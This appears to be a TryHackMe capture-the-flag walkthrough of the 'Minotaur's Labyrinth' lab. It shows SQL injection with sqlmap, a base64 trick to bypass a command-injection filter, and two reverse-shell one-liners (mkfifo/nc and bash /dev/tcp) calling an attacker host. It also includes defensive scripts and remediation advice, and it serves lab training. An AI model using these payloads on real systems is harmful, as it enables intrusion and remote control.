Cybersecurity, Hacking, Pentesting, Vulnerabilities
TryHackMe — Minotaur’s Labyrinth Walkthrough
A walkthrough with my tactics, techniques, and procedures.
Reconnaissance/Scanning:
I started off by scanning the target to see which ports were open and which services were running on them.
$ nmap -A -O -sC -sV -p- <machine_IP>
Running gobuster to scan for directories.
On the FTP server there's a directory to look into.
In that directory were a hidden directory and a text file. The text file didn't contain anything important.
In the hidden directory were the first flag and another text file.
This is what the text file keep_in_mind said:
Vulnerability assessment:
The /logs directory had a log file that showed some user credentials in plaintext!
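The find here is credentials sitting in a readable log file. As an added example (mine, not from the walkthrough or the box), this is the kind of quick sweep I run over exposed logs to spot that class of leak; the log lines are constructed for the example and the regex is a starting point, not a complete list of the forms credentials take.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): a grep-based sweep for
# credentials logged in plaintext. The log text below is constructed for the
# example; the real /logs contents are not reproduced here.

SAMPLE_LOG=$(cat <<'EOF'
2021-01-01 10:00:01 INFO  login ok user=alice
2021-01-01 10:00:05 DEBUG auth attempt user=alice password=hunter2
2021-01-01 10:00:09 INFO  ftp PASS secretpw
2021-01-01 10:00:12 INFO  health check ok
EOF
)

# Print the lines on stdin that look like they carry a secret:
# "password=", "passwd:", "pwd =" and similar, or an FTP PASS command.
find_plaintext_creds() {
    grep -Ei '(password|passwd|pwd)[[:space:]]*[=:]|(^|[[:space:]])pass[[:space:]]'
}

# Count credential-bearing lines in the log text passed as $1.
count_creds() {
    printf '%s\n' "$1" | find_plaintext_creds | wc -l | tr -d ' '
}

# Stand-alone usage: show the offending lines from the sample.
printf '%s\n' "$SAMPLE_LOG" | find_plaintext_creds
```

Run it against a real log directory with `cat /path/to/logs/* | find_plaintext_creds`; every hit is a credential that should be rotated, not just redacted from the log.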
Once logged in to the main webpage, there's a search bar that looks like it returns table or column names from a database.
I fired up Burp Suite to capture a request after submitting a value in the search bar, and fed that request file to sqlmap.
$ sqlmap -r /path/to/request/file --batch --dump
Looks like we got some usernames and hashes!
Crackstation[.]net cracked them easily since they're just MD5 hashes!
Upon logging into the webpage, the top nav bar showed the second flag.
When viewing the source code, I saw this comment.
And up at the top, the “Secret_Stuff” link leads to /echo.php
Exploit:
Visiting that page:
Thanks to the hint from TryHackMe, I knew which characters were filtered.
Luckily, the pipe character isn't filtered, so I tested whoami piped to bash, because just entering a command on its own only gets echoed back.
Since so many characters are filtered, I can't use a regular command to try to get a reverse shell.
That means I'll have to encode the payload and decode it on the target. Base64 is great for this: its alphabet is just letters, digits, + and /, with = used only as padding.
The reverse shell one liner I used was:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local_IP> <PORT> >/tmp/f
I encoded that and removed the equal sign at the end since it was one of the filtered characters.
<encoded_text> | base64 -d | bash
After sending that, I got a reverse shell!
Checking for hidden files.
That looks like a good file to inspect!
Looks like the root credentials for the DB.
Now to see the other users in the /home directory.
In this user’s home directory was the user flag.
Privilege Escalation:
Looking for a way to escalate privileges, I didn't have any luck: nothing useful in the cron jobs, no password for the current user so I couldn't run `sudo -l`, and no SUID binaries I could exploit.
I started checking for hidden files or anything useful in the root directory.
That's interesting: a directory called timers that's writable by all users.
One of the files on the FTP server mentioned keeping things on a timer.
In that directory was a script that starts another bash shell.
Well, since I can write to that file, I appended a reverse shell one-liner to the end of it.
$ echo "bash -i >& /dev/tcp/IP_ADDRESS/8080 0>&1" >> timer.sh
Shortly after that I got a reverse shell as root.
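The root cause is a script that root runs on a schedule but that any user can modify. As an added example (mine, not the walkthrough's or the box's code), here is the check that surfaces that misconfiguration and the remediation the report calls for; the directory layout is constructed with mktemp for the example and the real paths on the machine are not reproduced.

```shell
#!/usr/bin/env bash
# Added example (not from the original walkthrough): find scripts that are
# writable by everyone, which is what let the timer.sh append work, and lock
# them down so only root can change what the timer executes.

# List regular files under $1 whose "other" write bit (o+w, octal 002) is set.
find_world_writable() {
    find "$1" -type f -perm -002 2>/dev/null | sort
}

# Make a script root-owned and writable only by its owner (0755).
# chown is skipped when not running as root, so the example works unprivileged.
harden_script() {
    chmod 0755 "$1"
    if [ "$(id -u)" -eq 0 ]; then chown root:root "$1"; fi
}

# Build a throwaway tree mirroring the finding: a timers/ directory holding a
# world-writable timer.sh next to a correctly permissioned script.
setup_demo() {
    demo=$(mktemp -d)
    mkdir "$demo/timers"
    printf '#!/bin/bash\n/bin/bash\n' > "$demo/timers/timer.sh"
    chmod 0777 "$demo/timers/timer.sh"
    printf '#!/bin/bash\necho fine\n' > "$demo/timers/ok.sh"
    chmod 0755 "$demo/timers/ok.sh"
    printf '%s' "$demo"
}

# Stand-alone usage: show the finding, fix it, show it is gone.
d=$(setup_demo)
echo "before:"; find_world_writable "$d"
harden_script "$d/timers/timer.sh"
echo "after:";  find_world_writable "$d"
rm -rf "$d"
```

On a real host, run `find_world_writable /` and then confirm which hits are actually executed by root: `systemctl list-timers --all` plus the unit files under /etc/systemd/system, and root's crontab and /etc/cron.*, are the places to look. A world-writable script that nothing privileged runs is sloppy; one that a root timer runs is a straight path to root, as this box shows.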
Time to grab the root flag in the root directory.
Reporting:
- Disable anonymous login on FTP servers, and don't leave internal notes or flags in directories reachable over FTP.
- Validate and sanitize user input on web pages. A blocklist of filtered characters is easy to bypass (here, by base64-encoding the payload), so avoid passing user input to a shell at all, and use parameterized queries for database lookups.
- Ensure correct permissions are assigned on all files, especially scripts executed by root on a schedule; they must not be writable by other users.
- Don't store credentials in plaintext, including in log files.
- Use a slow, salted password hashing algorithm such as bcrypt or Argon2 instead of MD5 to protect stored passwords.